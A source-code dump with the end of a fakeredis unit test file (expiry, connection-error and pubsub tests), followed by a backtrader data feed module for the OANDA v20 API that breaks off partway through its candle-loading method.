self.redis.pexpireat('foo', int(time() * 1000 + 150))
sleep(0.2)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
def test_pexpireat_should_return_true_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.pexpireat('foo', int(time() * 1000 + 150))
self.assertIs(bool(rv), True)
def test_pexpireat_should_return_false_for_missing_key(self):
rv = self.redis.pexpireat('missing', int(time() * 1000 + 150))
self.assertIs(bool(rv), False)
def test_ttl_should_return_none_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.ttl('foo'), None)
def test_ttl_should_return_value_for_expiring_key(self):
self.redis.set('foo', 'bar')
self.redis.expire('foo', 1)
self.assertEqual(self.redis.ttl('foo'), 1)
self.redis.expire('foo', 2)
self.assertEqual(self.redis.ttl('foo'), 2)
# See https://github.com/antirez/redis/blob/unstable/src/db.c#L632
ttl = 1000000000
self.redis.expire('foo', ttl)
self.assertEqual(self.redis.ttl('foo'), ttl)
def test_pttl_should_return_none_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.pttl('foo'), None)
def test_pttl_should_return_value_for_expiring_key(self):
d = 100
self.redis.set('foo', 'bar')
self.redis.expire('foo', 1)
self.assertInRange(self.redis.pttl('foo'), 1000 - d, 1000)
self.redis.expire('foo', 2)
self.assertInRange(self.redis.pttl('foo'), 2000 - d, 2000)
ttl = 1000000000
# See https://github.com/antirez/redis/blob/unstable/src/db.c#L632
self.redis.expire('foo', ttl)
self.assertInRange(self.redis.pttl('foo'),
ttl * 1000 - d,
ttl * 1000)
def test_ttls_should_always_be_long(self):
self.redis.set('foo', 'bar')
self.redis.expire('foo', 1)
self.assertTrue(type(self.redis.ttl('foo')) is long)
self.assertTrue(type(self.redis.pttl('foo')) is long)
def test_expire_should_not_handle_floating_point_values(self):
self.redis.set('foo', 'bar')
with self.assertRaisesRegexp(
redis.ResponseError, 'value is not an integer or out of range'):
self.redis.expire('something_new', 1.2)
self.redis.pexpire('something_new', 1000.2)
self.redis.expire('some_unused_key', 1.2)
self.redis.pexpire('some_unused_key', 1000.2)
def test_lock(self):
lock = self.redis.lock('foo')
lock.acquire()
self.assertTrue(self.redis.exists('foo'))
lock.release()
self.assertFalse(self.redis.exists('foo'))
with self.redis.lock('bar'):
self.assertTrue(self.redis.exists('bar'))
self.assertFalse(self.redis.exists('bar'))
class DecodeMixin(object):
decode_responses = True
def _round_str(self, x):
self.assertIsInstance(x, fakeredis.text_type)
return round(float(x))
def assertEqual(self, a, b, msg=None):
super(DecodeMixin, self).assertEqual(a, fakeredis._decode(b), msg)
def assertIn(self, member, container, msg=None):
super(DecodeMixin, self).assertIn(fakeredis._decode(member), container)
def assertItemsEqual(self, a, b):
super(DecodeMixin, self).assertItemsEqual(a, fakeredis._decode(b))
class TestFakeStrictRedisDecodeResponses(DecodeMixin, TestFakeStrictRedis):
def create_redis(self, db=0):
return fakeredis.FakeStrictRedis(db=db, decode_responses=True)
class TestFakeRedisDecodeResponses(DecodeMixin, TestFakeRedis):
def create_redis(self, db=0):
return fakeredis.FakeRedis(db=db, decode_responses=True)
@redis_must_be_running
class TestRealRedis(TestFakeRedis):
def create_redis(self, db=0):
return redis.Redis('localhost', port=6379, db=db)
@redis_must_be_running
class TestRealStrictRedis(TestFakeStrictRedis):
def create_redis(self, db=0):
return redis.StrictRedis('localhost', port=6379, db=db)
@redis_must_be_running
class TestRealRedisDecodeResponses(TestFakeRedisDecodeResponses):
def create_redis(self, db=0):
return redis.Redis('localhost', port=6379, db=db, decode_responses=True)
@redis_must_be_running
class TestRealStrictRedisDecodeResponses(TestFakeStrictRedisDecodeResponses):
def create_redis(self, db=0):
return redis.StrictRedis('localhost', port=6379, db=db, decode_responses=True)
class TestInitArgs(unittest.TestCase):
def test_can_accept_any_kwargs(self):
fakeredis.FakeRedis(foo='bar', bar='baz')
fakeredis.FakeStrictRedis(foo='bar', bar='baz')
def test_singleton(self):
r1 = fakeredis.FakeStrictRedis(singleton=False)
r2 = fakeredis.FakeStrictRedis(singleton=False)
r3 = fakeredis.FakeStrictRedis()
r4 = fakeredis.FakeStrictRedis()
r3.flushall()
r1.set('foo', 'bar')
r3.set('bar', 'baz')
self.assertIn('foo', r1)
self.assertNotIn('foo', r2)
self.assertNotIn('foo', r3)
self.assertIn('bar', r3)
self.assertIn('bar', r4)
self.assertNotIn('bar', r1)
def test_from_url(self):
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/0')
db.set('foo', 'bar')
self.assertEqual(db.get('foo'), b'bar')
def test_from_url_with_db_arg(self):
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/0')
db1 = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/1')
db2 = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/',
db=2)
db.set('foo', 'foo0')
db1.set('foo', 'foo1')
db2.set('foo', 'foo2')
self.assertEqual(db.get('foo'), b'foo0')
self.assertEqual(db1.get('foo'), b'foo1')
self.assertEqual(db2.get('foo'), b'foo2')
def test_from_url_db_value_error(self):
# In ValueError, should default to 0
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/a')
self.assertEqual(db._db_num, 0)
def test_can_pass_through_extra_args(self):
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/0',
decode_responses=True)
db.set('foo', 'bar')
self.assertEqual(db.get('foo'), 'bar')
class TestImportation(unittest.TestCase):
def test_searches_for_c_stdlib_and_raises_if_missing(self):
"""
Verifies that fakeredis checks for multiple C library implementations
looking for a strtod implementation and that it fails fast when neither
is found.
"""
import ctypes.util
# Patch manually since unittest.mock.patch is not available in old Python versions
old_find_library = ctypes.util.find_library
searched_libraries = set()
try:
ctypes.util.find_library = lambda library: searched_libraries.add(library)
with self.assertRaises(ImportError):
reload(fakeredis)
self.assertEqual(set(['c', 'msvcrt', 'System']), searched_libraries)
finally:
ctypes.util.find_library = old_find_library
reload(fakeredis)
class TestFakeStrictRedisConnectionErrors(unittest.TestCase):
def create_redis(self):
return fakeredis.FakeStrictRedis(db=0, connected=False)
def setUp(self):
self.redis = self.create_redis()
def tearDown(self):
del self.redis
def test_flushdb(self):
with self.assertRaises(redis.ConnectionError):
self.redis.flushdb()
def test_flushall(self):
with self.assertRaises(redis.ConnectionError):
self.redis.flushall()
def test_append(self):
with self.assertRaises(redis.ConnectionError):
self.redis.append('key', 'value')
self.assertEqual(self.redis._db, {}, 'DB should be empty')
def test_bitcount(self):
with self.assertRaises(redis.ConnectionError):
self.redis.bitcount('key', 0, 20)
def test_decr(self):
with self.assertRaises(redis.ConnectionError):
self.redis.decr('key', 2)
self.assertEqual(self.redis._db, {}, 'DB should be empty')
def test_exists(self):
with self.assertRaises(redis.ConnectionError):
self.redis.exists('key')
def test_expire(self):
with self.assertRaises(redis.ConnectionError):
self.redis.expire('key', 20)
def test_pexpire(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pexpire('key', 20)
def test_echo(self):
with self.assertRaises(redis.ConnectionError):
self.redis.echo('value')
def test_get(self):
with self.assertRaises(redis.ConnectionError):
self.redis.get('key')
def test_getbit(self):
with self.assertRaises(redis.ConnectionError):
self.redis.getbit('key', 2)
def test_getset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.getset('key', 'value')
def test_incr(self):
with self.assertRaises(redis.ConnectionError):
self.redis.incr('key')
def test_incrby(self):
with self.assertRaises(redis.ConnectionError):
self.redis.incrby('key')
def test_ncrbyfloat(self):
with self.assertRaises(redis.ConnectionError):
self.redis.incrbyfloat('key')
def test_keys(self):
with self.assertRaises(redis.ConnectionError):
self.redis.keys()
def test_mget(self):
with self.assertRaises(redis.ConnectionError):
self.redis.mget(['key1', 'key2'])
def test_mset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.mset(('key', 'value'))
def test_msetnx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.msetnx({'key': 'value'})
def test_persist(self):
with self.assertRaises(redis.ConnectionError):
self.redis.persist('key')
def test_rename(self):
self.redis.connected = True
self.redis.set('key1', 'value')
self.redis.connected = False
with self.assertRaises(redis.ConnectionError):
self.redis.rename('key1', 'key2')
self.redis.connected = True
self.assertTrue(self.redis.exists('key1'))
def test_watch(self):
with self.assertRaises(redis.ConnectionError):
self.redis.watch()
def test_unwatch(self):
with self.assertRaises(redis.ConnectionError):
self.redis.unwatch()
def test_eval(self):
with self.assertRaises(redis.ConnectionError):
self.redis.eval('', 0)
def test_lpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lpush('name', [1, 2])
def test_lrange(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lrange('name', 1, 5)
def test_llen(self):
with self.assertRaises(redis.ConnectionError):
self.redis.llen('name')
def test_lrem(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lrem('name', 2, 2)
def test_rpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpush('name', [1])
def test_lpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lpop('name')
def test_lset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lset('name', 1, 4)
def test_rpushx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpushx('name', 1)
def test_ltrim(self):
with self.assertRaises(redis.ConnectionError):
self.redis.ltrim('name', 1, 4)
def test_lindex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lindex('name', 1)
def test_lpushx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lpushx('name', 1)
def test_rpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpop('name')
def test_linsert(self):
with self.assertRaises(redis.ConnectionError):
self.redis.linsert('name', 'where', 'refvalue', 'value')
def test_rpoplpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpoplpush('src', 'dst')
def test_blpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.blpop('keys')
def test_brpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.brpop('keys')
def test_brpoplpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.brpoplpush('src', 'dst')
def test_hdel(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hdel('name')
def test_hexists(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hexists('name', 'key')
def test_hget(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hget('name', 'key')
def test_hgetall(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hgetall('name')
def test_hincrby(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hincrby('name', 'key')
def test_hincrbyfloat(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hincrbyfloat('name', 'key')
def test_hkeys(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hkeys('name')
def test_hlen(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hlen('name')
def test_hset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hset('name', 'key', 1)
def test_hsetnx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hsetnx('name', 'key', 2)
def test_hmset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hmset('name', {'key': 1})
def test_hmget(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hmget('name', ['a', 'b'])
def test_hvals(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hvals('name')
def test_sadd(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sadd('name', [1, 2])
def test_scard(self):
with self.assertRaises(redis.ConnectionError):
self.redis.scard('name')
def test_sdiff(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sdiff(['a', 'b'])
def test_sdiffstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sdiffstore('dest', ['a', 'b'])
def test_sinter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sinter(['a', 'b'])
def test_sinterstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sinterstore('dest', ['a', 'b'])
def test_sismember(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sismember('name', 20)
def test_smembers(self):
with self.assertRaises(redis.ConnectionError):
self.redis.smembers('name')
def test_smove(self):
with self.assertRaises(redis.ConnectionError):
self.redis.smove('src', 'dest', 20)
def test_spop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.spop('name')
def test_srandmember(self):
with self.assertRaises(redis.ConnectionError):
self.redis.srandmember('name')
def test_srem(self):
with self.assertRaises(redis.ConnectionError):
self.redis.srem('name')
def test_sunion(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sunion(['a', 'b'])
def test_sunionstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sunionstore('dest', ['a', 'b'])
def test_zadd(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zadd('name')
def test_zcard(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zcard('name')
def test_zcount(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zcount('name', 1, 5)
def test_zincrby(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zincrby('name', 1)
def test_zinterstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zinterstore('dest', ['a', 'b'])
def test_zrange(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrange('name', 1, 5)
def test_zrangebyscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrangebyscore('name', 1, 5)
def test_rangebylex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrangebylex('name', 1, 4)
def test_zrem(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrem('name', [1])
def test_zremrangebyrank(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zremrangebyrank('name', 1, 5)
def test_zremrangebyscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zremrangebyscore('name', 1, 5)
def test_zremrangebylex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zremrangebylex('name', 1, 5)
def test_zlexcount(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zlexcount('name', 1, 5)
def test_zrevrange(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrange('name', 1, 5, 1)
def test_zrevrangebyscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrangebyscore('name', 5, 1)
def test_zrevrangebylex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrangebylex('name', 5, 1)
def test_zrevran(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zrevrank('name', 2)
def test_zscore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zscore('name', 2)
def test_zunionstor(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zunionstore('dest', ['1', '2'])
def test_pipeline(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pipeline()
def test_transaction(self):
with self.assertRaises(redis.ConnectionError):
def func(a):
return a * a
self.redis.transaction(func, 3)
def test_lock(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lock('name')
def test_pubsub(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pubsub()
def test_pfadd(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pfadd('name', [1])
def test_pfmerge(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pfmerge('dest', ['a', 'b'])
def test_scan(self):
with self.assertRaises(redis.ConnectionError):
self.redis.scan()
def test_sscan(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sscan('name')
def test_hscan(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hscan('name')
def test_scan_iter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.scan_iter()
def test_sscan_iter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sscan_iter('name')
def test_hscan_iter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hscan_iter('name')
class TestPubSubConnected(unittest.TestCase):
def create_redis(self):
return fakeredis.FakePubSub(connected=False)
def setUp(self):
self.pubsub = self.create_redis()
def tearDown(self):
del self.pubsub
def test_basic_subscript(self):
with self.assertRaises(redis.ConnectionError):
self.pubsub.subscribe('logs')
def test_subscript_conn_lost(self):
self.pubsub.connected = True
self.pubsub.subscribe('logs')
self.pubsub.connected = False
with self.assertRaises(redis.ConnectionError):
self.pubsub.get_message()
def test_put_listen(self):
self.pubsub.connected = True
count = self.pubsub.put('logs', 'mymessage', 'subscribe')
self.assertEqual(count, 1, 'Message could should be 1')
self.pubsub.connected = False
with self.assertRaises(redis.ConnectionError):
self.pubsub.get_message()
self.pubsub.connected = True
msg = self.pubsub.get_message()
check = {
'type': 'subscribe',
'pattern': None,
'channel': b'logs',
'data': 'mymessage'
}
self.assertEqual(msg, check, 'Message was not published to channel')
if __name__ == '__main__':
unittest.main()
|
oandav20feed.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from datetime import datetime, timedelta, timezone
import time as _time
import threading
from backtrader.feed import DataBase
from backtrader import TimeFrame, date2num, num2date
from backtrader.utils.py3 import queue, with_metaclass
from btoandav20.stores import oandav20store
class MetaOandaV20Data(DataBase.__class__):
def __init__(self, name, bases, dct):
'''Class has already been created ... register'''
# Initialize the class
super(MetaOandaV20Data, self).__init__(name, bases, dct)
# Register with the store
oandav20store.OandaV20Store.DataCls = self
class OandaV20Data(with_metaclass(MetaOandaV20Data, DataBase)):
'''Oanda v20 Data Feed.
Params:
- ``qcheck`` (default: ``0.5``)
Time in seconds to wake up if no data is received to give a chance to
resample/replay packets properly and pass notifications up the chain
- ``historical`` (default: ``False``)
If set to ``True`` the data feed will stop after doing the first
download of data.
The standard data feed parameters ``fromdate`` and ``todate`` will be
used as reference.
The data feed will make multiple requests if the requested duration is
larger than the one allowed by IB given the timeframe/compression
chosen for the data.
- ``backfill_start`` (default: ``True``)
Perform backfilling at the start. The maximum possible historical data
will be fetched in a single request.
- ``backfill`` (default: ``True``)
Perform backfilling after a disconnection/reconnection cycle. The gap
duration will be used to download the smallest possible amount of data
- ``backfill_from`` (default: ``None``)
An additional data source can be passed to do an initial layer of
backfilling. Once the data source is depleted and if requested,
backfilling from oanda will take place. This is ideally meant to
backfill from already stored sources like a file on disk, but not
limited to.
- ``bidask`` (default: ``True``)
If ``True``, then the historical/backfilling requests will request
bid/ask prices from the server
If ``False``, then *midpoint* will be requested
- ``useask`` (default: ``False``)
If ``True`` the *ask* part of the *bidask* prices will be used instead
of the default use of *bid*
- ``reconnect`` (default: ``True``)
Reconnect when network connection is down
- ``reconnections`` (default: ``-1``)
Number of times to attempt reconnections: ``-1`` means forever
- ``candles`` (default: ``False``)
Return candles instead of streaming for current data, granularity
needs to be higher than Ticks
This data feed supports only this mapping of ``timeframe`` and
``compression``, which comply with the definitions in the OANDA API
Developer's Guide:
(TimeFrame.Seconds, 5): 'S5',
(TimeFrame.Seconds, 10): 'S10',
(TimeFrame.Seconds, 15): 'S15',
(TimeFrame.Seconds, 30): 'S30',
(TimeFrame.Minutes, 1): 'M1',
(TimeFrame.Minutes, 2): 'M3',
(TimeFrame.Minutes, 3): 'M3',
(TimeFrame.Minutes, 4): 'M4',
(TimeFrame.Minutes, 5): 'M5',
(TimeFrame.Minutes, 10): 'M10',
(TimeFrame.Minutes, 15): 'M15',
(TimeFrame.Minutes, 30): 'M30',
(TimeFrame.Minutes, 60): 'H1',
(TimeFrame.Minutes, 120): 'H2',
(TimeFrame.Minutes, 180): 'H3',
(TimeFrame.Minutes, 240): 'H4',
(TimeFrame.Minutes, 360): 'H6',
(TimeFrame.Minutes, 480): 'H8',
(TimeFrame.Days, 1): 'D',
(TimeFrame.Weeks, 1): 'W',
(TimeFrame.Months, 1): 'M',
Any other combination will be rejected
'''
params = dict(
qcheck=0.5,
historical=False, # do backfilling at the start
backfill_start=True, # do backfilling at the start
backfill=True, # do backfilling when reconnecting
backfill_from=None, # additional data source to do backfill from
bidask=True,
useask=False,
candles=False,
# TODO readd tmout - set timeout in store
reconnect=True,
reconnections=-1, # forever
)
_store = oandav20store.OandaV20Store
# States for the Finite State Machine in _load
_ST_FROM, _ST_START, _ST_LIVE, _ST_HISTORBACK, _ST_OVER = range(5)
def islive(self):
'''Returns ``True`` to notify ``Cerebro`` that preloading and runonce
should be deactivated'''
return True
def __init__(self, **kwargs):
self.o = self._store(**kwargs)
if self.p.bidask:
self._candleFormat = 'A' if self.p.useask else 'B'
else:
self._candleFormat = 'M'
def setenvironment(self, env):
'''Receives an environment (cerebro) and passes it over to the store it
belongs to'''
super(OandaV20Data, self).setenvironment(env)
env.addstore(self.o)
def start(self):
'''Starts the Oanda connection and gets the real contract and
contractdetails if it exists'''
super(OandaV20Data, self).start()
# Create attributes as soon as possible
self._statelivereconn = False # if reconnecting in live state
self._storedmsg = dict() # keep pending live message (under None)
self.qlive = queue.Queue()
self._state = self._ST_OVER
self._reconns = self.p.reconnections
self.contractdetails = None
# Kickstart store and get queue to wait on
self.o.start(data=self)
# check if the granularity is supported
otf = self.o.get_granularity(self._timeframe, self._compression)
if otf is None:
self.put_notification(self.NOTSUPPORTED_TF)
self._state = self._ST_OVER
return
self.contractdetails = cd = self.o.get_instrument(self.p.dataname)
if cd is None:
self.put_notification(self.NOTSUBSCRIBED)
self._state = self._ST_OVER
return
if self.p.backfill_from is not None:
self._state = self._ST_FROM
self._st_start(True)
self.p.backfill_from.setenvironment(self._env)
self.p.backfill_from._start()
else:
self._start_finish()
self._state = self._ST_START # initial state for _load
self._st_start()
self._reconns = 0
def _st_start(self, instart=True):
if self.p.historical:
self.put_notification(self.DELAYED)
dtend = None
if self.todate < float('inf'):
dtend = num2date(self.todate)
dtbegin = None
if self.fromdate > float('-inf'):
dtbegin = num2date(self.fromdate)
self.qhist = self.o.candles(
self.p.dataname, dtbegin, dtend,
self._timeframe, self._compression,
candleFormat=self._candleFormat,
includeFirst=True)
self._state = self._ST_HISTORBACK
return True
# depending on candles, either stream or use poll
if instart:
self._statelivereconn = self.p.backfill_start
else:
self._statelivereconn = self.p.backfill
if self._statelivereconn:
self.put_notification(self.DELAYED)
if not self.p.candles:
# recreate a new stream on call
self.qlive = self.o.streaming_prices(
self.p.dataname)
elif instart:
# poll thread will never die, so no need to recreate it
self.poll_thread()
self._state = self._ST_LIVE
return True # no return before - implicit continue
def poll_thread(self):
t = threading.Thread(target=self._t_poll)
t.daemon = True
t.start()
def _t_poll(self):
dtstart = self._getstarttime(
self._timeframe,
self._compression,
offset=1)
while True:
dtcurr = self._getstarttime(self._timeframe, self._compression)
# request candles in live instead of stream
if dtcurr > dtstart:
if len(self) > 1:
# len == 1 ... forwarded for the 1st time
dtbegin = self.datetime.datetime(-1)
elif self.fromdate > float('-inf'):
dtbegin = num2date(self.fromdate)
else: # 1st bar and no begin set
dtbegin = dtstart
self.qlive = self.o.candles(
self.p.dataname, dtbegin, None,
self._timeframe, self._compression,
candleFormat=self._candleFormat,
onlyComplete=True,
includeFirst=False)
dtstart = dtbegin
# sleep until next call
dtnow = datetime.utcnow()
dtnext = self._getstarttime(
self._timeframe,
self._compression,
dt=dtnow,
offset=-1)
dtdiff = dtnext - dtnow
tmout = (dtdiff.days * 24 * 60 * 60) + dtdiff.seconds + 1
if tmout <= 0:
tmout = 5
_time.sleep(tmout)
def _getstarttime(self, timeframe, compression, dt=None, offset=0):
'''This method will return the start of the period based on current
time (or provided time). It is using UTC 22:00 (5:00 pm New York)
as the start of the day.'''
if dt is None:
dt = datetime.utcnow()
if timeframe == TimeFrame.Seconds:
dt = dt.replace(
second=(dt.second // compression) * compression,
microsecond=0)
if offset:
dt = dt - timedelta(seconds=compression*offset)
elif timeframe == TimeFrame.Minutes:
if compression >= 60:
hours = 0
minutes = 0
# get start of day
dtstart = self._getstarttime(TimeFrame.Days, 1, dt)
# diff start of day with current time to get seconds
# since start of day
dtdiff = dt - dtstart
hours = dtdiff.seconds//((60*60)*(compression//60))
minutes = compression % 60
dt = dtstart + timedelta(hours=hours, minutes=minutes)
else:
dt = dt.replace(
minute=(dt.minute // compression) * compression,
second=0,
microsecond=0)
if offset:
dt = dt - timedelta(minutes=compression*offset)
elif timeframe == TimeFrame.Days:
# TODO use sessionstart if available, else use 0
# start of day is UTC 22 (5pm new york)
if dt.hour < 22:
dt = dt - timedelta(days=1)
if offset:
dt = dt - timedelta(days=offset)
dt = dt.replace(hour=22, minute=0, second=0, microsecond=0)
elif timeframe == TimeFrame.Weeks:
if dt.weekday() != 6:
# sunday is start of week at 5pm new york
dt = dt - timedelta(days=dt.weekday() + 1)
if offset:
dt = dt - timedelta(days=offset * 7)
# TODO use sessionstart if available, else use 0
dt = dt.replace(hour=22, minute=0, second=0, microsecond=0)
elif timeframe == TimeFrame.Months:
if offset:
dt = dt - timedelta(days=(min(28 + dt.day, 31)))
# last day of month
last_day_of_month = dt.replace(day=28) + timedelta(days=4)
last_day_of_month = last_day_of_month - timedelta(
days=last_day_of_month.day)
last_day_of_month = last_day_of_month.day
# start of month (1 at 0, 22 last day of prev month)
if dt.day < last_day_of_month:
dt = dt - timedelta(days=dt.day)
# TODO use sessionstart if available, else use 0
dt = dt.replace(hour=22, minute=0, second=0, microsecond=0)
return dt
def stop(self):
'''Stops and tells the store to stop'''
super(OandaV20Data, self).stop()
self.o.stop()
def replay(self, **kwargs):
# save original timeframe and compression to fetch data
# they will be overriden when calling replay
orig_timeframe = self._timeframe
orig_compression = self._compression
# setting up replay configuration
super(DataBase, self).replay(**kwargs)
# putting back original timeframe and compression to fetch correct data
# the replay configuration will still use the correct dataframe and
# compression for strategy
self._timeframe = orig_timeframe
self._compression = orig_compression
def haslivedata(self):
return bool(self._storedmsg or self.qlive) # do not return the objs
def _load(self):
if self._state == self._ST_OVER:
return False
while True:
if self._state == self._ST_LIVE:
try:
msg = (self._storedmsg.pop(None, None) or
self.qlive.get(timeout=self._qcheck))
except queue.Empty:
return None
if 'msg' in msg:
self.put_notification(self.CONNBROKEN)
if not self.p.reconnect or self._reconns == 0:
# Can no longer reconnect
self.put_notification(self.DISCONNECTED)
self._state = self._ST_OVER
return False # failed
# sleep only on reconnect
if self._reconns != self.p.reconnections:
_time.sleep(self.o.p.reconntimeout)
# Can reconnect
self._reconns -= 1
self._st_start(instart=False)
continue
self._reconns = self.p.reconnections
# Process the message according to expected return type
if not self._statelivereconn:
if self._laststatus != self.LIVE:
if self.qlive.qsize() <= 1: # very short live queue
self.put_notification(self.LIVE)
if msg:
if self.p.candles:
ret = self._load_candle(msg)
else:
ret = self._load_tick(msg)
if ret:
return True
# could not load bar ... go and get new one
continue
# Fall through to processing reconnect - try to backfill
self._storedmsg[None] = msg # keep the msg
# else do a backfill
if self._laststatus != self.DELAYED:
self.put_notification(self.DELAYED)
dtend = None
if len(self) > 1:
# len == 1 ... forwarded for the 1st time
dtbegin = self.datetime.datetime(-1).astimezone(timezone.utc)
elif self.fromdate > float('-inf'):
dtbegin = num2date(self.fromdate)
else: # 1st bar and no begin set
# passing None to fetch max possible in 1 request
dtbegin = None
if msg:
dtend = datetime.utcfromtimestamp(float(msg['time']))
# TODO not sure if incomplete candles may destruct something
self.qhist = self.o.candles(
self.p.dataname, dtbegin, dtend,
self._timeframe, self._compression,
candleFormat=self._candleFormat,
includeFirst=True, onlyComplete=False)
self._state = self._ST_HISTORBACK
self._statelivereconn = False # no longer in live
continue
elif self._state == self._ST_HISTORBACK:
msg = self.qhist.get()
if msg is None:
continue
elif 'msg' in msg: # Error
if not self.p.reconnect or self._reconns == 0:
# Can no longer reconnect
self.put_notification(self.DISCONNECTED)
self._state = self._ST_OVER
return False # failed
# Can reconnect
self._reconns -= 1
self._st_start(instart=False)
continue
if msg:
if self._load_candle(msg):
return True # loading worked
continue # not loaded ... date may have been seen
else:
# End of histdata
if self.p.historical: # only historical
self.put_notification(self.DISCONNECTED)
self._state = self._ST_OVER
return False # end of historical
# Live is also wished - go for it
self._state = self._ST_LIVE
continue
elif self._state == self._ST_FROM:
if not self.p.backfill_from.next():
# additional data source is consumed
self._state = self._ST_START
continue
# copy lines of the same name
for alias in self.lines.getlinealiases():
lsrc = getattr(self.p.backfill_from.lines, alias)
ldst = getattr(self.lines, alias)
ldst[0] = lsrc[0]
return True
elif self._state == self._ST_START:
if not self._st_start(instart=False):
self._state = self._ST_OVER
return False
def _load_tick(self, msg):
dtobj = datetime.utcfromtimestamp(float(msg['time']))
dt = date2num(dtobj)
if dt <= self.lines.datetime[-1]:
return False # time already seen
# Common fields
self.lines.datetime[0] = dt
self.lines.volume[0] = 0.0
self.lines.openinterest[0] = 0.0
# Put the prices into the bar
if self.p.bidask:
if self.p.useask:
tick = float(msg['asks'][0]['price'])
else:
tick = float(msg['bids'][0]['price'])
else:
# create mid price
tick = (
float(msg['bids'][0]['price'])
+ float(msg['asks'][0]['price'])) / 2
self.lines.open[0] = tick
self.lines.high[0] = tick
self.lines.low[0] = tick
self.lines.close[0] = tick
self.lines.volume[0] = 0.0
self.lines.openinterest[0] = 0.0
return True
def _load_candle(self, msg):
dtobj = datetime.utcfromtimestamp(float(msg['time']))
dt = date2num(dtobj)
if dt <= self.lines.datetime[-1]:
return False # time already seen
# Common fields
self.lines.datetime[0] = dt
self.lines.volume[0] = float(msg['volume'])
self.lines.openinterest[0] = 0.0
# Put the prices into the bar
if self.p.bidask:
if not self.p.useask:
self.lines.open[0] = float(msg['bid']['o'])
self.lines.high[0] = float(msg['bid']['h'])
self.lines.low[0] = float(msg['bid']['l'])
self.lines.close[0] = float(msg['bid']['c'])
else:
self.lines.open[0] = float(msg['ask']['o'])
self.lines.high[0] = float(msg['ask']['h'])
self.lines.low[0] = float(msg['ask']['l'])
self.lines.close[0] = float(msg['ask']['c'])
else:
self.lines.open[0] = float(msg['mid']['o'])
self.lines.high[0] = float(msg['mid']['h'])
self.lines.low[0] = float(msg['mid']['l'])
